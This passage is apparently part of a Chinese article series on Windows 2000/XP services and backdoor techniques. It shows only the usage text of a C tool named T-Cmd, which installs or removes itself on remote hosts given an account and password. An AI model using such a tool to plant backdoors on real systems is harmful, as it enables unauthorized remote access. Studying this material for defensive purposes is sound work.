浅析Windows 2000/XP服务与后门技术(14) printf(" T-Cmd -Help\n"); printf(" T-Cmd -Install [RemoteHost] [Account] [Password]\n"); printf(" T-Cmd -Remove [RemoteHost] [Account] [Password]\n\n"); printf("Example:\n"); printf(" T-Cmd -Install (Install in the localhost)\n"); printf(" T-Cmd -Remove (Remove in the localhost)\n"); printf(" T-Cmd -Install 192.168.0.1 TOo2y 123456 (Install in 192.168.0.1)\n"); printf(" T-Cmd -Remove 192.168.0.1 TOo2y 123456 (Remove in 192.168.0.1)\n"); printf(" T-Cmd -Install 192.168.0.2 TOo2y NULL (NULL instead of no password)\n\n"); return ; }